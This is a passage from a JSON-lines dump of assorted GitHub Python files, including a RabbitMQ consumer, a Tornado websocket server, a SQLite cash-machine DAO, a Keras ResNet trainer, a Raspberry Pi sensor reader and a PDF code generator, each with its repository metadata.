to from the user\nseverities = sys.argv[1:]\nif not severities:\n sys.stderr.write(\"Usage: %s [info] [warning] [error]\\n\" % sys.argv[0])\n sys.exit(1)\n\n#bind the severities to the queue\nfor severity in severities:\n channel.queue_bind(exchange='direct_logs',\n queue=queue_name,\n routing_key=severity)\n\nprint(' [*] Waiting for logs. To exit press CTRL+C')\n\n#define the calback\ndef callback(ch, method, properties, body):\n print(\" [x] %r:%r\" % (method.routing_key, body))\n\n#register the callback for the queue\nchannel.basic_consume(callback,\n queue=queue_name,\n no_ack=True)\n\n#start consuming\nchannel.start_consuming()\n","repo_name":"ygpravikumar/rabbitmq","sub_path":"4-recieve_log_direct.py","file_name":"4-recieve_log_direct.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7931581834","text":"import zmq\nimport os.path\nfrom tornado.web import Application, StaticFileHandler\nfrom tornado.websocket import WebSocketHandler\nfrom zmq.eventloop import ioloop as ZIOLoop\nfrom tornado.ioloop import IOLoop\nfrom zmq.eventloop.zmqstream import ZMQStream\n\n\nZIOLoop.install()\ncontext = zmq.Context()\n\nGraph = None\n\nclass WSHandler(WebSocketHandler):\n def open(self):\n global Graph # globals :(\n sub_sock = context.socket(zmq.SUB)\n sub_sock.connect(\"ipc:///tmp/netnetwork.sock\")\n sub_sock.setsockopt(zmq.SUBSCRIBE, 'gupdates')\n self.sub_stream = ZMQStream(sub_sock)\n self.sub_stream.on_recv(self.on_zmq_recv)\n print('Opened a new websocket')\n if Graph is not None:\n self.write_message(Graph)\n\n def on_zmq_recv(self, msg):\n global Graph\n print(\"Forwarding message to client\")\n self.write_message(msg[1])\n Graph = msg[1]\n\n def on_close(self):\n print(\"Closing ws stream\")\n self.sub_stream.close()\n\n\ndef server():\n \"\"\"\n Function that spins up the tornado webserver.\n We have two routes, /static which goes to our js and html\n and /ws which is the websocket which just streams stuff from\n a zmq socket.\n \"\"\"\n static_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"static\")\n app = Application([\n (r'/ws', WSHandler),\n (r'/(.*)', StaticFileHandler, {\"path\": static_path}),\n ])\n app.listen(8080)\n IOLoop.instance().start()\n","repo_name":"rossdylan/netnetwork","sub_path":"netnetwork/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27459088012","text":"import unittest\n\nfrom Task import *\nfrom Duty import *\nfrom Piece import *\n\nclass TestDuty(unittest.TestCase):\n\n def test_registerTask(self):\n \n dty = Duty()\n\n taskToAdd = Task(\"TLVHAS-DVS-04\", \"Importer des champs UDs\", \"123456\")\n dt1 = 7.0\n pce = Piece(taskToAdd, '2020-04-22 8:08:03.0', '2020-04-22 8:08:10.0')\n\n dty.addPiece(pce)\n\n self.assertEqual(len(dty.tasksRegistered), 1, \\\n \"Length of task registered in duty should be 1.\") \n self.assertEqual(dty.tasksRegistered[0].completedTime, dt1, \\\n \"Completed time should be equal\")\n \n dt2 = 5.0\n pce2 = Piece(taskToAdd, '2020-04-22 8:08:10.0', '2020-04-22 8:08:15.0')\n dty.addPiece(pce2)\n self.assertEqual(len(dty.tasksRegistered), 1, \\\n \"Length of task registered in duty should be 1.\") \n\n self.assertEqual(dty.tasksRegistered[0].completedTime, (dt1 + dt2))\n \n\n dt3 = 3.0\n taskToAdd2 = Task(\"TLVHAS-DVS-04\", \"Importer des champs UDs\", \"\")\n pce3 = Piece(taskToAdd2, '2020-04-22 8:08:15.0', '2020-04-22 8:08:18.0')\n dty.addPiece(pce3)\n self.assertEqual(len(dty.tasksRegistered), 2)\n\n self.assertEqual(dty.tasksRegistered[1].completedTime, (dt3))\n\n dt4 = 3.0\n taskToAdd3 = Task(\"BRAHA19\", \"Fixer bug\", \"\")\n pce4 = Piece(taskToAdd3, '2020-04-22 8:08:15.0', '2020-04-22 8:08:18.0')\n dty.addPiece(pce4)\n self.assertEqual(len(dty.tasksRegistered), 3)\n\n self.assertEqual(dty.tasksRegistered[0].completedTime, (dt1 + dt2))\n self.assertEqual(dty.tasksRegistered[1].completedTime, (dt3))\n self.assertEqual(dty.tasksRegistered[2].completedTime, (dt4))\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"patrick-deschambault/turboClock","sub_path":"TestDuty.py","file_name":"TestDuty.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44290929256","text":"import numpy as np\n\n# Part 1\nwith open(\"./Day1/input.txt\") as f:\n data = list(map(int, f.read().splitlines()))\n count = 0\n top = np.inf\n for depth in data:\n if depth > top:\n count += 1\n top = depth\n print(\"Part 1 :\", count)\n\n# Part 1\nwith open(\"./Day1/input.txt\") as f:\n data = list(map(int, f.read().splitlines()))\n count = 0\n for i in range(len(data) - 3):\n if sum(data[i+1 : i+4]) > sum(data[i : i+3]):\n count += 1\n print(\"Part 2 :\", count)\n","repo_name":"ThomasLepercq/AdventOfCode2021","sub_path":"Day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33268331303","text":"from datetime import datetime\nfrom sqlite3 import Error\nfrom sqlite3 import connect\n\nfrom cash_machine import CacheMachine\nfrom transaction import Transaction\nfrom transaction import TransactionType\nfrom user import User\nfrom user import UserRole\n\n\nclass SystemDao:\n DB_FILE = \"cash_machine.db\"\n\n SELECT_USER_BY_USERNAME = \"\"\" SELECT * FROM users\n WHERE username = ?\n ; \"\"\"\n\n INSERT_USER_SQL = \"\"\"INSERT INTO users(username, password, role) \n VALUES (?,?,?)\n ;\"\"\"\n\n SELECT_AVAILABLE_BANKNOTES_QUERY = \"\"\" SELECT * FROM banknotes \n WHERE count > 0\n ORDER BY denomination DESC\n ;\"\"\"\n\n SELECT_WITHDRAW_LIMIT_QUERY = \"\"\" SELECT * FROM withdraw_limit; \"\"\"\n\n UPDATE_BANKNOTES_SQL = \"\"\" UPDATE banknotes \n SET count = ?\n WHERE DENOMINATION = ?\n ;\"\"\"\n\n UPDATE_WITHDRAW_LIMIT_SQL = \"\"\" UPDATE withdraw_limit \n SET value = ?\n ;\"\"\"\n\n UPDATE_USER_BALANCE_SQL = \"\"\" UPDATE users \n SET balance = ?\n WHERE id = ?\n ;\"\"\"\n\n INSERT_TRANSACTION_SQL = \"\"\"INSERT INTO transactions(user_id, amount, type, timestamp) \n VALUES (?,?,?,?)\n ;\"\"\"\n\n SELECT_TRANSACTIONS_BY_USER_ID_QUERY = \"\"\"SELECT * FROM transactions\n WHERE user_id = ?\n ;\"\"\"\n\n def __init__(self) -> None:\n self.__connection = connect(SystemDao.DB_FILE)\n\n def __del__(self) -> None:\n self.__connection.close()\n\n def get_user_by_username(self, username: str) -> User:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.SELECT_USER_BY_USERNAME, (username,))\n user_raw = cursor.fetchone()\n return User(user_raw[0], user_raw[1], user_raw[2], UserRole[user_raw[3].upper()], user_raw[4]) if user_raw else None\n\n def insert_new_user(self, user) -> User:\n try:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.INSERT_USER_SQL, (user.username, user.password, str(user.role)))\n self.__connection.commit()\n user.id = cursor.lastrowid\n except Error as e:\n print(\"Ошибка при сохранении нового пользователя:\", e)\n self.__connection.rollback()\n return user\n\n def update_user_balance(self, user) -> bool:\n try:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.UPDATE_USER_BALANCE_SQL, (user.balance, user.id))\n self.__connection.commit()\n return True\n except Error as e:\n print(\"Ошибка при обновлении баланса пользователя:\", e)\n self.__connection.rollback()\n return False\n\n def get_cash_machine(self) -> CacheMachine:\n return CacheMachine(self.__get_available_banknotes(), self.__get_withdraw_limit())\n\n def __get_available_banknotes(self) -> dict:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.SELECT_AVAILABLE_BANKNOTES_QUERY)\n return {banknote[1]: banknote[2] for banknote in cursor.fetchall()}\n\n def __get_withdraw_limit(self) -> int:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.SELECT_WITHDRAW_LIMIT_QUERY)\n return cursor.fetchone()[1]\n\n def update_cash_machine(self, cache_machine: CacheMachine) -> bool:\n try:\n self.__update_available_banknotes(cache_machine.banknotes)\n self.__update_withdraw_limit(cache_machine.withdraw_limit)\n self.__connection.commit()\n return True\n except Error as e:\n print(\"Ошибка при сохранении состояния банкомата:\", e)\n self.__connection.rollback()\n return False\n\n def __update_available_banknotes(self, banknotes) -> None:\n cursor = self.__connection.cursor()\n for denomination, count in banknotes.items():\n cursor.execute(SystemDao.UPDATE_BANKNOTES_SQL, (count, denomination))\n\n def __update_withdraw_limit(self, withdraw_limit) -> None:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.UPDATE_WITHDRAW_LIMIT_SQL, (withdraw_limit,))\n\n def get_transactions_by_user(self, user) -> list:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.SELECT_TRANSACTIONS_BY_USER_ID_QUERY, (user.id,))\n raw_transactions = cursor.fetchall()\n transactions = []\n for raw_transaction in raw_transactions:\n transaction = Transaction(raw_transaction[0], user, raw_transaction[2],\n TransactionType[raw_transaction[3].upper()],\n datetime.fromisoformat(raw_transaction[4]))\n transactions.append(transaction)\n return transactions\n\n def save_data_after_transaction(self, transaction, cash_machine) -> bool:\n try:\n cursor = self.__connection.cursor()\n cursor.execute(SystemDao.UPDATE_USER_BALANCE_SQL, (transaction.user.balance, transaction.user.id))\n self.__update_available_banknotes(cash_machine.banknotes)\n self.__update_withdraw_limit(cash_machine.withdraw_limit)\n cursor.execute(SystemDao.INSERT_TRANSACTION_SQL, (transaction.user.id, transaction.amount,\n str(transaction.transaction_type), transaction.timestamp))\n self.__connection.commit()\n return True\n except Error as e:\n self.__connection.rollback()\n print(\"Ошибка во время созранения данных после транзакции:\", e)\n return False\n","repo_name":"CatherineSM/Python","sub_path":"HT_14/system_dao.py","file_name":"system_dao.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9618967727","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 10 10:46:38 2018\r\n\r\n@author: Herman Wu\r\n\"\"\"\r\n\r\nimport numpy as np \r\nnp.random.seed(1337) # for reproducibility \r\nfrom keras.models import Sequential,Model \r\nfrom keras.layers import Add,Dense,Dropout,Activation,Input \r\nfrom keras.layers import GlobalMaxPooling2D,GlobalAveragePooling2D,ZeroPadding2D \r\nfrom keras import optimizers \r\nfrom keras.layers import Conv2D\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.initializers import glorot_uniform\r\nimport time\r\nimport keras.backend as K\r\nfrom keras.models import load_model\r\nfrom keras.callbacks import Callback\r\n\r\nclass ElapsedTimer(object):\r\n def __init__(self):\r\n self.start_time = time.time()\r\n def elapsed(self,sec):\r\n if sec < 60:\r\n return str(sec) + \" sec\"\r\n elif sec < (60 * 60):\r\n return str(sec / 60) + \" min\"\r\n else:\r\n return str(sec / (60 * 60)) + \" hr\"\r\n def elapsed_time(self):\r\n print(\"The running time of this code: %s \" % self.elapsed(time.time() - self.start_time) )\r\n\r\nclass LossHistory(Callback):\r\n def on_train_begin(self, logs={}):\r\n self.losses = []\r\n \r\n def on_batch_end(self, batch, logs={}):\r\n self.losses.append(logs.get('loss'))\r\n \r\ndef Identity_Block(inputs,filters):\r\n Filter1,Filter2,Filter3=filters\r\n########################################################################################################### \r\n x1=Conv2D(Filter1,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(inputs)\r\n z1=BatchNormalization(axis=3)(x1)\r\n a1=Activation('elu')(z1)\r\n \r\n x2=Conv2D(Filter2,(3,3),padding='same',kernel_initializer=glorot_uniform(seed=0))(a1)\r\n z2=BatchNormalization(axis=3)(x2)\r\n a2=Activation('elu')(z2)\r\n \r\n x3=Conv2D(Filter3,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(a2)\r\n z3=BatchNormalization(axis=3)(x3)\r\n \r\n z_sum=Add()([z3,inputs])\r\n a3=Activation('elu')(z_sum)\r\n########################################################################################################### \r\n return a3\r\n\r\ndef Convolution_Block(inputs,filters):\r\n Filter1,Filter2,Filter3=filters\r\n########################################################################################################### \r\n x1=Conv2D(Filter1,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(inputs) \r\n z1=BatchNormalization(axis=3)(x1)\r\n a1=Activation('elu')(z1)\r\n \r\n x2=Conv2D(Filter2,(3,3),padding='same',kernel_initializer=glorot_uniform(seed=0))(a1)\r\n z2=BatchNormalization(axis=3)(x2)\r\n a2=Activation('elu')(z2)\r\n \r\n x3=Conv2D(Filter3,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(a2)\r\n z3=BatchNormalization(axis=3)(x3)\r\n \r\n x_shortcut=Conv2D(Filter3,(1,1),padding='same',kernel_initializer=glorot_uniform(seed=0))(inputs)\r\n z_shortcut=BatchNormalization(axis=3)(x_shortcut)\r\n \r\n z_sum=Add()([z3,z_shortcut])\r\n a3=Activation('elu')(z_sum)\r\n########################################################################################################### \r\n return a3 \r\n \r\ndef ModelBuild(model,input_shape):\r\n inputs = Input(input_shape)\r\n X_inputs=ZeroPadding2D((1,1))(inputs)\r\n \r\n c1=Conv2D(24,(3,3),padding='valid',data_format=\"channels_last\",kernel_initializer=glorot_uniform(seed=0))(X_inputs)\r\n b1=BatchNormalization(axis=3)(c1)\r\n r1=Activation('elu')(b1)\r\n########################################################################################################### \r\n Con1=Convolution_Block(r1,[24,24,48])\r\n Iden1=Identity_Block(Con1,[24,24,48])\r\n Iden2=Identity_Block(Iden1,[24,24,48])\r\n \r\n Con2=Convolution_Block(Iden2,[48,48,64])\r\n Iden3=Identity_Block(Con2,[48,48,64])\r\n Iden4=Identity_Block(Iden3,[48,48,64])\r\n\r\n Con3=Convolution_Block(Iden4,[64,64,72])\r\n Iden5=Identity_Block(Con3,[64,64,72])\r\n Iden6=Identity_Block(Iden5,[64,64,72])\r\n\r\n Con4=Convolution_Block(Iden6,[72,72,84])\r\n Iden6=Identity_Block(Con4,[72,72,84])\r\n Iden7=Identity_Block(Iden6,[72,72,84])\r\n \r\n f1=GlobalAveragePooling2D(name='Glob_MaxPool_Lay')(Iden7)\r\n########################################################################################################### \r\n drop1=Dropout(0.4,name='Drop_1')(f1)\r\n # d1=Dense(64,activation='relu',name='DenseLay_1')(drop1)\r\n d2=Dense(48,activation='relu',name='DenseLay_2')(drop1)\r\n d3=Dense(24,activation='elu',name='DenseLay_3')(d2)\r\n O1=Dense(1,activation='elu',name='OutLay')(d3)\r\n model = Model(input=inputs, output=O1)\r\n return model\r\n########################################################################################################### \r\ndef mean_pred(y_true,y_pred):\r\n return K.mean(y_pred)\r\n\r\ndef configure(model,Loss='mse'):\r\n optimizers.rmsprop(lr=0.045)\r\n model.compile(loss=Loss,optimizer='rmsprop')#,metrics=[mean_pred])\r\n print('\\n################ The Detail of the ResNet ###################') \r\n print(model.summary())\r\n time.sleep(5)\r\n print('\\n######################################################################\\n')\r\n\r\ndef Single_main(Base_dir,Docx,DocY,epoch=3000,batch_size=50,TF=False,mode=None):\r\n in_shape= (None, None, 1) \r\n# Four_InputX=Docx['4by4_data']\r\n# Four_InputY=DocY['4by4_data']\r\n Five_InputX=Docx['5by5_data']\r\n Five_InputY=DocY['5by5_data']\r\n# Six_InputX=Docx['6by6_data']\r\n# Six_InputY=DocY['6by6_data']\r\n \r\n if TF==False:\r\n Network=Sequential()\r\n Network=ModelBuild(Network,in_shape)\r\n configure(Network)\r\n else :\r\n H5_file=Base_dir+'/predict_h5file/5by5_ConcatNet.h5'\r\n Network=load_model(H5_file)\r\n \r\n timer = ElapsedTimer() \r\n\r\n history = LossHistory()\r\n print('/*******************************************************/\\n')\r\n print(' Now we begin to train this model.\\n')\r\n print('/*******************************************************/\\n') \r\n if mode=='4by4':\r\n Network.fit(Four_InputX,Four_InputY,epochs=epoch,batch_size=batch_size,validation_split=0.1,shuffle=True)\r\n elif mode=='5by5':\r\n Network.fit(Five_InputX,Five_InputY,epochs=epoch,batch_size=batch_size,validation_split=0.1,shuffle=True,callbacks=[history])\r\n elif mode=='6by6':\r\n Network.fit(Six_InputX,Six_InputY,epochs=epoch,batch_size=batch_size,validation_split=0.1,shuffle=True) \r\n# =============================================================================\r\n print('/*******************************************************/')\r\n print(' finished!! ')\r\n timer.elapsed_time()\r\n\r\n print('/*******************************************************/\\n') \r\n return Network,history\r\n\r\ndef main(Base_dir,Docx,DocY,epoch=3000,batch_size=50,TF=False):\r\n in_shape= (None, None, 1) \r\n History_4by4=[]\r\n History_5by5=[]\r\n History_6by6=[]\r\n# Iteration_num=int(len(Docx['6by6_data'])/batch_size);\r\n temp_len=max(len(Docx['4by4_data']),len(Docx['5by5_data']),len(Docx['6by6_data']))\r\n Iteration_num=int(temp_len//batch_size);\r\n Four_num=int(len(Docx['4by4_data'])//batch_size);\r\n Five_num=int(len(Docx['5by5_data'])//batch_size);\r\n Six_num=int(len(Docx['6by6_data'])//batch_size); \r\n Four_InputX=Docx['4by4_data']\r\n Four_InputY=DocY['4by4_data']\r\n Five_InputX=Docx['5by5_data']\r\n Five_InputY=DocY['5by5_data']\r\n Six_InputX=Docx['6by6_data']\r\n Six_InputY=DocY['6by6_data']\r\n\r\n########################################################################################################### \r\n if TF==False:\r\n Network=Sequential()\r\n Network=ModelBuild(Network,in_shape)\r\n configure(Network)\r\n else :\r\n H5_file=Base_dir+'/predict_h5file/5by5_ResNet.h5'\r\n Network=load_model(H5_file)\r\n########################################################################################################### \r\n timer = ElapsedTimer() \r\n print('/*******************************************************/\\n')\r\n print(' Now we begin to train this model.\\n')\r\n print('/*******************************************************/\\n') \r\n########################################################################################################### \r\n for i in range(epoch):\r\n for j in range(Iteration_num):\r\n if (j+1)*batch_size>len(Docx['4by4_data']):\r\n j0=j%Four_num\r\n History_4by4.append(Network.train_on_batch(Four_InputX[j0*batch_size:(j0+1)*batch_size,:,:,:],Four_InputY[j0*batch_size:(j0+1)*batch_size,:]))\r\n else:\r\n History_4by4.append(Network.train_on_batch(Four_InputX[j*batch_size:(j+1)*batch_size,:,:,:],Four_InputY[j*batch_size:(j+1)*batch_size,:]))\r\n if (j+1)*batch_size>len(Docx['5by5_data']):\r\n j0=j%Five_num\r\n History_5by5.append(Network.train_on_batch(Five_InputX[j0*batch_size:(j0+1)*batch_size,:,:,:],Five_InputY[j0*batch_size:(j0+1)*batch_size,:]))\r\n else:\r\n History_5by5.append(Network.train_on_batch(Five_InputX[j*batch_size:(j+1)*batch_size,:,:,:],Five_InputY[j*batch_size:(j+1)*batch_size,:])) \r\n if (j+1)*batch_size>len(Docx['6by6_data']):\r\n j0=j%Six_num\r\n History_6by6.append(Network.train_on_batch(Six_InputX[j0*batch_size:(j0+1)*batch_size,:,:,:],Six_InputY[j0*batch_size:(j0+1)*batch_size,:]))\r\n else:\r\n History_6by6.append(Network.train_on_batch(Six_InputX[j*batch_size:(j+1)*batch_size,:,:,:],Six_InputY[j*batch_size:(j+1)*batch_size,:])) \r\n if (i%20==0):\r\n print('In iteration '+str(i)+', The Training detail is : 4by4: '+ str(History_4by4[i])) \r\n print('In iteration '+str(i)+', The Training detail is : 5by5: '+ str(History_5by5[i])) \r\n print('In iteration '+str(i)+', The Training detail is : 6by6: '+ str(History_6by6[i])+'\\n') \r\n########################################################################################################### \r\n print('/*******************************************************/')\r\n print(' finished!! ')\r\n########################################################################################################### \r\n if TF==True:\r\n h5_dir=Base_dir+'/predict_h5file/total_TF6_Rcn.h5'\r\n elif TF==False:\r\n h5_dir=Base_dir+'/predict_h5file/total_Non-TF_Rcn.h5'\r\n Network.save(h5_dir)\r\n timer.elapsed_time()\r\n print('/*******************************************************/\\n') \r\n return Network\r\n","repo_name":"jianlin-cheng/DeepGraphene","sub_path":"Graphene_DeepLearning/Script/Predict/DeepGraphene/Residual_Net.py","file_name":"Residual_Net.py","file_ext":"py","file_size_in_byte":10684,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"3693820472","text":"import pandas as pd\nimport numpy as np\nfrom cross_content_based_recSys.CrossContentBasedRecSys import ContentBasedRecSys, CrossEmbContentBasedREcSys\nfrom influence_graph.InfluenceGraph import InfluenceGraph\n\ndf_ml_movies = pd.read_csv('/home/ignacio/Datasets/Amazon/Data cleaned/movie_meta_valid_genres_description.csv')\ndf_bx_book = pd.read_csv('/home/ignacio/Datasets/Amazon/Data cleaned/book_meta_valid_shelves_rating_description.csv')\ndf_bx_book['common-shelves'] = df_bx_book['common-shelves'].fillna('')\ndf_movie_ratings = pd.read_csv('/home/ignacio/Datasets/Amazon/Data cleaned/ratings_movie_intersect_ii.csv')\ndf_bu = pd.read_csv('/home/ignacio/Datasets/Amazon/Data cleaned/movie_bu.csv')\n#Define influence graph\ng_social = InfluenceGraph()\n\n#origen_space\ntfidf_matrix_origen = np.load('/home/ignacio/Datasets/Amazon/Data cleaned/Embedding/Target to Origin space/movie_space.npy')\n\n#target_space\ntfidf_matrix_target = np.load('/home/ignacio/Datasets/Amazon/Data cleaned/Embedding/Target to Origin space/book_space.npy')\n\n#user_space\nusers_profiles_matrix = np.load('/home/ignacio/Datasets/Amazon/Data cleaned/Embedding/Target to Origin space/user_space.npy')\nusers_id = df_movie_ratings['userId'].unique()\nusers_profiles = {}\nidx = 0\nfor user_id in users_id:\n users_profiles[user_id] = users_profiles_matrix[idx].reshape(1,-1)\n idx += 1\n\n#Define model\ncross_content_model = CrossEmbContentBasedREcSys(\n df_items_origen=df_ml_movies, df_items_target=df_bx_book ,tfidf_matrix_origen= tfidf_matrix_origen,\n user_profile=users_profiles, tfidf_matrix_target=tfidf_matrix_target, df_bu= df_bu, rating_matrix= df_movie_ratings)\n\n\nresult = cross_content_model.recommend_items(user_id='AGEIT17HENDIS')\n\nresult.to_csv('/home/ignacio/Datasets/Amazon/Data cleaned/Recommendation/Embedding/recommendation_rating_proof.csv', index=False)\nprint(result.head())","repo_name":"ignaciogatti/CrossDomRecSys","sub_path":"test_embedding/TestCBEmbRecSys.py","file_name":"TestCBEmbRecSys.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"42379509399","text":"def main():\n\n lista = []\n \n print ('CADASTRO DE USUÁRIOS')\n\n for i in range (1,4):\n print(f'\\nCadastro {i}')\n usuario = {\n 'nome':input(\"Nome: \").upper(),\n 'endereco':input(\"Endereço: \"),\n 'cpf':input(\"CPF: \"),\n }\n lista.append(usuario)\n\n print ('\\nLISTA DE USUÁRIOS CADASTRADOS') \n\n for i in range (0,3):\n print(f'\\nUsuário {i+1}')\n print (f\"Nome: {lista[i]['nome']}\")\n print (f\"Endereço: {lista[i]['endereco']}\")\n print (f\"CPF: {lista[i]['cpf']}\")\n \n\nmain()","repo_name":"joaohfgarcia/python","sub_path":"uniesp_p2/dicionarios_exE.py","file_name":"dicionarios_exE.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14362847367","text":"import parametrages #on importe le fichier des variables necessaire au bon fonctionnement du programme\n\nimport board #chaque port a un board répertoire (adresse) contenant des cartes appartenant à une ligne de microcontrôleur spécifique\n\nimport sys #interagit avec l’interpréteur Python\nimport time\n\nimport adafruit_shtc3 #adresse du capteur de température et d'humidité\nimport adafruit_lps2x #adresse du capteur de pression\n\n#i2c: bus informatique (capteurs sensehat(B)) --> ligne horloge et données utilisées à la fois pour envoi et réception données \n\ni2c = board.I2C()\n\ndef recup_capteurs(): #renvoie température, humidité, pression\n sht = adafruit_shtc3.SHTC3(i2c) #initialisation de la variable du capteur de température/humidité\n lps = adafruit_lps2x.LPS22(i2c,0x5c) #initialisation de la variable du capteur de pression, changement d'adresse 0x5c\n return sht.temperature, sht.relative_humidity, lps.pressure\n\n\n\n######################### Main #########################################################################################\n\nprint (\"Test réception données des capteurs:\\n\")\nwhile True:\n try:\n temperature, humidite, pression = recup_capteurs()\n print (\"Température: %0.1f °C\" % temperature)\n print (\"Humidité: %0.1f %%fH\" % humidite)\n print (\"Pression: %.2f hPa\" % pression)\n time.sleep(parametrages.temps)\n except KeyboardInterrupt:\n sys.exit(\"\\nArrêt du programme.\") #termine le programme en cours d'exécution\n","repo_name":"ilanouk/DigitalTwinProject","sub_path":"Raspberry_capteurs/Test/test_recup_capteurs.py","file_name":"test_recup_capteurs.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5601350502","text":"from torchvision import datasets, transforms\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.utils.data import DataLoader\r\n\r\ncustom_transform = transforms.Compose([transforms.ToTensor()])\r\n\r\n\r\ndef make_data_loader(args):\r\n custom_transform = transforms.Compose([transforms.ToTensor()])\r\n\r\n # Get Dataset\r\n dataset = datasets.CIFAR10(\r\n args.data, train=True, transform=custom_transform, download=True\r\n )\r\n\r\n # Split dataset into train, validation, and test sets\r\n train_size = int(0.8 * len(dataset))\r\n val_size = int(0.1 * len(dataset))\r\n test_size = len(dataset) - train_size - val_size\r\n train_dataset, val_dataset, test_dataset = torch.utils.data.random_split(\r\n dataset, [train_size, val_size, test_size]\r\n )\r\n\r\n # Get DataLoaders\r\n train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)\r\n val_loader = DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False)\r\n test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False)\r\n\r\n return train_loader, val_loader, test_loader\r\n","repo_name":"ydoo123/DeepL_project","sub_path":"utils/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25080934332","text":"arr = []\n\nwhile True:\n num = input()\n if num == \".\":\n break\n else:\n arr.append(float(num))\n \n \nminimum = arr[0]\n\nfor i in range(0, len(arr)):\n if arr[i] < minimum:\n minimum = arr[i]\n\nprint(minimum)\n","repo_name":"probablyArth/Zookeeper","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13976302432","text":"from fpdf import FPDF\nimport sqlite3\nimport time\n\n\ndef write_codes(codes_it, name):\n pdf = FPDF('P', 'mm', (330, 480))\n pdf.add_font('Calibri', '', 'calibri.ttf', uni=True)\n pdf.set_author('Asen Georgiev')\n pdf.add_page()\n pdf.set_font('Calibri', '', 12) # B,I or U on the second position\n pdf.set_auto_page_break(False) # Not to add a new page when the cursor goes too low\n small_step = True\n x_ofs = 0\n y_ofs = 0\n pdf.ln(41) # header on the first page\n pdf.cell(20) # margin on the first page\n for code in codes_it:\n pdf.cell(20, 10, code, 0, 0, 'C')\n\n if x_ofs < 5: # if the line is not full\n pdf.cell(30) # right shifting in mm\n x_ofs += 1\n elif x_ofs == 5: # if the line is full\n if small_step:\n pdf.ln(24) # the small line shift in mm\n small_step = False\n pdf.rotate(180) # turning the letters upside down\n pdf.cell(-290) # shifting one full line because flipped line starts from the right\n else:\n pdf.ln(94) # the big line shift in mm\n pdf.rotate(0) # restoring the flipped letters\n pdf.cell(20)\n small_step = True\n\n if y_ofs < 7: # if the page is not full\n y_ofs += 1\n else: # if the page is full\n y_ofs = 0\n if pdf.page_no() < 1042: # not to have an empty page in the end\n pdf.add_page()\n pdf.ln(41) # header\n pdf.cell(20) # margin\n\n x_ofs = 0\n pdf.output(name, 'F')\n\n\ndef query_codes(amount, file_name):\n\n conn = sqlite3.connect('chio_codes.sqlite')\n cur = conn.cursor()\n time_now = time.strftime('%Y-%m-%d %H:%M:%S')\n\n cur.execute('''INSERT OR IGNORE INTO Usage (datetime, pdf_file_name)\n VALUES (?, ?)''', (time_now, file_name))\n cur.execute('SELECT id FROM Usage WHERE datetime = ? ', (time_now, ))\n usage_id = cur.fetchone()[0]\n\n cur.execute('UPDATE Codes SET usage_id = ? WHERE id in (SELECT id FROM Codes WHERE usage_id IS NULL LIMIT ?)',\n (usage_id, amount))\n\n cur.execute('SELECT code FROM Codes WHERE usage_id = ? ', (usage_id, ))\n codes_it = cur.fetchall()\n conn.commit()\n return (code[0] for code in codes_it)\n\n\ndef ren_file(file_name):\n\n conn = sqlite3.connect('chio_codes.sqlite')\n cur = conn.cursor()\n cur.execute('SELECT id FROM Usage WHERE pdf_file_name = ? ', (file_name, ))\n file_id = cur.fetchone()[0]\n updated_file_name = f'{file_id}_{file_name}'\n\n return updated_file_name\n\n\nif __name__ == '__main__':\n for _ in range(106):\n out_file = 'Chio_Codes_{}.pdf'.format(time.strftime('%Y_%m_%d_%H_%M_%S')) # adds to db the name without index\n codes = query_codes(50016, out_file) # 50016 codes per file, 1042 pages\n out_file_with_index = ren_file(out_file)\n write_codes(codes, out_file_with_index)\n","repo_name":"crawler4o/UpWork","sub_path":"codes_generator/pdf_writer.py","file_name":"pdf_writer.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71704766227","text":"\"\"\" Given an array of strings words, return the first palindromic string in the array. If there is no such string, return an empty string \"\".\n\nA string is 